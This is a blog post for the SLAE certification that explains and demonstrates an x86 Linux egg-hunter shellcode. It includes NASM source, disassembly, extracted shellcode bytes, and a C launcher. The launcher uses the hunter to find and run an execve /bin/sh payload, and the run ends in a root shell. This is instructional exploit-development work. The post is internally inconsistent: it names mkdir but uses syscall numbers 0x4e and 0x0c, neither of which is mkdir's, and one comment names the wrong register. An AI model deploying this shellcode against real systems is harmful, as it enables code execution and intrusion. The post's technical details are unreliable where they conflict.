Student ID : SLAE  - 1314

Assignment 3:

In this assignment a working demo of an EggHunter shellcode will be shown in practice. Specifically the goal of this assignment is the following

  • Study about the Egg Hunter shellcode
  • Create a working demo of  the Egg Hunter
  • The Egg Hunter should be configurable for different payloads
Disclaimer :
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

Egg Hunters Theory 

In classic stack based buffer overflow, the buffer size is big enough to hold the shellcode, but in cases where the buffer length is bigger than the available buffer size then the shellcode will not fit into the available memory region and eventually it will crash on execution. For that reason, one solution is to use egghunters. In more detail, egghunting is a useful exploitation technique implemented to overcome the deficiency of a small buffer that cannot hold a shellcode that is bigger than the small available memory region. In addition to this, it might be possible to access a larger buffer somewhere else in memory. Doing so, a tag of 4 bytes will be prepended at the shellcode and placed inside the larger buffer. To this end, the small available memory region will contain a jump instruction to the egghunter. Then the egghunter will search the stack or the heap for two consecutive tags to find the shellcode, and in case the shellcode is found, then it will be executed. Essentially, egghunter is a piece of code that searches through the VAS ( Virtual Address Space ) looking for a token specified by the writer of the egghunter.

Virtual Address Space 

According to wikipedia, the range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer's instruction set architecture and supported by the operating system's pointer size implementation, which can be 4 bytes for 32-bit. One important thing this implementation achieves, is that it provides security through process isolation assuming each process is given a separate address space.

The address space at IA32 can have the smallest granular unit of memory which is 4096 bytes of page size. The following C program will show the page size used by the operating system

#include <stdio.h>
#include <unistd.h>

int main (void)
{
printf ("the page size is %ld bytes. \n", sysconf(_SC_PAGESIZE));
return 0;
}

After compiling and executing the program the results will be as follows

root@kali:~/Documents# gcc -o pagesize pagesize.c
root@kali:~/Documents# ./pagesize
the page size is 4096 bytes.

Furthermore, aligning a page on a page-sized boundary (e.g. 4096 bytes) allows the  hardware to map a virtual address to a physical address by substituting the higher bits in the address, rather doing complex arithmetic.

The EggHunting approach 

In this case scenario we will build an Assembly program that will use a system call in order to search for the EGG in every available memory page on the system. If the program accesses an invalid memory page then an EFAULT error will be triggered  and the program will skip to the next page. Also, if the next page is valid but the EGG is not found then the program will go to the next page and so on until the EGG will be found in memory.

As Skape mentioned to his paper the Egghunter must satisfy the following requirements

  1. It must be robust
  2. It must be small
  3. it must be fast

Having in mind the above requirements and according to skape paper, abusing the syscalls seems to be a more elegant and less intrusive method to obtain our purpose.

As skape states :

" The first and most obvious approach would be to register a SIGSEGV handler to catch invalid memory address dereferences and prevent the program from crashing. The second technique that can be used involves abusing the system call interface provided by the operating system to validate process VMAs in kernel mode. This approach offers a fair bit of elegance in that there are a wide array of system calls to choose from that might better suit the need of the searcher, and, furthermore, is less intrusive to the program itself than would be installing a segmentation fault signal handler " 

Also the following statement from Skape's paper says that using a system call could provide us with everything we need to implement our Egghunter

” When a system call encounters an invalid memory address, most will return the EFAULT error code to indicate that a pointer provided to the system call was not valid. Fortunately for the egg hunter, this is the exact type of information it needs in order to safely traverse the process’ VAS without dereferencing the invalid memory regions that are strewn about the process “

The mkdir System call

The above important statements are leading us to choose from a variety of system calls but in this case we will choose the mkdir(2) system call in order to build our Egghunter.

According to mkdir(2) man page, the purpose of this system call is to create a new directory. Also as we can see in the man page of mkdir(2) syscall, the EFAULT error is supported.

According to Skape's paper, there are two reasons of choosing a system call :

" 1.  First, the system call had to have a pointer for just one argument, as multiple pointer arguments would require more register initialisation, and thus violate requirement #2 regarding size.

2.  Secondly, the system call had to not attempt to write to the pointer supplied, as it could lead to bad things happening if the memory were indeed writable, which in all likelihood would be the case for the buffer that would hold the egg being searched for. "

mkdir(2) prototype :

#include <sys/stat.h>
#include <sys/types.h>

int mkdir(const char *pathname, mode_t mode);

The Egg Hunter Implementation

The steps to build the Egghunter will be the following

  1. Use an EGG of 8 bytes and store it in register.
  2. Execute the syscall
  3. compare the return code with -14 (EFAULT which is 0xf2 in hex)
  4. if the comparison doesn't match go to the next page and continue from point 2
  5. if the comparison matches (ZF=0) the EGG is found
  6. execute the shellcode

At the first point above the 8 bytes word EGG is a 4 bytes string repeated 2 times and stored somewhere in memory. The reason of using a 4 bytes string repeated 2 times is because we must save the search pattern in one of the CPU registers and to avoid the case where the search of the EGG encounters the pattern itself instead of the Egghunter stored in the buffer.

The pathname pointer argument at the mkdir(2) system call will be abused by loading the memory address to be compared in order to find a valid memory page. If there is a valid memory page and no EFAULT returned, then the memory page will be checked for the egg 0x50905090 tag.

Analysis and Implementation 

First the following three instructions will be used to initialise registers. The ebx contains the four byte version of the egg tag that is searched, which, in this case is 0x50905090. Then the ecx register will be zeroed out using xor instruction as well the edx and eax using mul instruction.

_start:  
mov ebx, 0x50905090    ; Store EGG in EDX 
xor ecx, ecx           ; Zero out ECX  
mul ecx                ; Zero out EAX and EDX 

Next, the dx register will be used to perform memory alignment while taking into consideration the smallest granular unit of memory on IA32 which is PAGE_SIZE with the size of 4096 bytes. The memory alignment must be performed in case an invalid memory address might returned from the mkdir(2) syscall, where in such case all addresses in the memory page will also be invalid. So, in order to avoid shellcode from breaking because of the existence of null bytes in case of the hex representation of 4096 bytes (0x1000), the following technique will be followed

npage:                    
or dx, 0xfff    ; Align a region of memory

Next, pushad instruction will push all general registers into the stack in order to preserve values to be used with mkdir(2) syscall. Later on, the ebx register will hold the address [edx+4] and then the lower byte register al will be assigned with the immediate value 0x0c which represents the mkdir(2) syscall. After that, the int 0x80 instruction will call mkdir(2) syscall. Later on, the return value from mkdir(2) syscall will be compared with the hex value 0xf2 which represents the EFAULT errno value.

naddr:
inc edx            ; increase EDX to achieve 4096 bytes page (4KiB)                                   
pushad             ; push the general purpose values into the stack 
lea ebx, [edx+4]   ; put address [edx+4] to ebx 
mov al, 0x4e       ; syscall for mkdir() to lower byte register al 
int 0x80           ; call mkdir() 
cmp al, 0xf2       ; 0xf2 is 242 in decimal - check for EFAULT (errno code 256-242 = 14 - bad file address) 

Then all the registers will restore their values by using popad instruction. In case the mkdir(2) syscall doesn't return EFAULT, then the value stored in ebx will be compared with the value contained in [edx] address in order to check if the egg 0x50905090 tag is located inside this address. Otherwise, in case the mkdir(2) syscall returns EFAULT, then the memory address space will be indicated as invalid and the search will be forwarded to the next page. Also in case the first comparison is successful, meaning the egg 0x50905090 tag is found, the next four(4) bytes will also be checked in order to find out if the second egg 0x50905090 tag is also assigned. Furthermore, if the egg 0x50905090 tag is not assigned to the address [edx+4], the next address will also be checked, otherwise [edx] and [edx+4] will contain the egg tag.

popad            ; restore the general purpose registers 
jz npage         ; if mkdir() returned EFAULT, go to the next page 
cmp [edx], ebx   ; check if egg 0x50905090 tag is in [edx] address 
jnz  naddr       ; if ZF=0 then it doesnt match so it goes to the next page 
cmp [edx+4], ebx ; also check if EGG second tag is found in [edx+4] 
jne naddr        ; If egg (0x50905090) tag not found then visit next address 
jmp edx          ; [edx] and [edx+4] contain the second egg (0x50905090) 

Now lets proceed further and test the hunter. First, the program will be compiled using the following commands

root@kali:~/Documents/SLAE/Assignment3# nasm -f elf -o egg.o egg.nasm
root@kali:~/Documents/SLAE/Assignment3# ld -z execstack -o egg egg.o

Then the opcodes will be checked if null bytes exist using objdump

root@kali:~/Documents/SLAE/Assignment3# objdump -M intel -D egg

egg:     file format elf32-i386


Disassembly of section .text:

08049000 <_start>:
 8049000:   bb 90 50 90 50          mov    ebx,0x50905090
 8049005:   31 c9                   xor    ecx,ecx
 8049007:   f7 e1                   mul    ecx

08049009 <npage >:
 8049009:   66 81 ca ff 0f          or     dx,0xfff

0804900e <naddr >:
 804900e:   42                      inc    edx
 804900f:   60                      pusha
 8049010:   8d 5a 04                lea    ebx,[edx+0x4]
 8049013:   b0 0c                   mov    al,0xc
 8049015:   cd 80                   int    0x80
 8049017:   3c f2                   cmp    al,0xf2
 8049019:   61                      popa
 804901a:   74 ed                   je     8049009 <npage>
 804901c:   39 1a                   cmp    DWORD PTR [edx],ebx
 804901e:   75 ee                   jne    804900e <naddr>
 8049020:   39 5a 04                cmp    DWORD PTR [edx+0x4],ebx
 8049023:   75 e9                   jne    804900e <naddr>
 8049025:   ff e2                   jmp    edx

Then the shellcode will be produced using objdump as follows

root@kali:~/Documents/SLAE/Assignment3# objdump -d ./egg|grep '[0-9a-f]:'|grep -v 
'file'|cut -f2 -d:|cut -f1-5 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 
's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0
\x0c\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"

The following program will be used for the execution of the Egghunter

#include <stdio.h>
#include <string.h>

#define EGG "\x90\x50\x90\x50"

unsigned char egghunter[] = \
"\xbb"
EGG
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x0c\xcd\x80\x3c\xf2
\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2";

// execve stack shellcode /bin/sh
unsigned char shellcode[] = \
EGG
EGG
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53
\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
        printf("Shellcode Length:  %d\n", strlen(shellcode));
        int (*ret)() = (int(*)()) egghunter;
        ret();
}

if we compile and run the code above we will have a our  execve shellcode executed

root@kali:~/Documents/SLAE/Assignment3# gcc -fno-stack-protector -g -z execstack -m32 -o shell shell.c ./shell
Shellcode Length: 33
#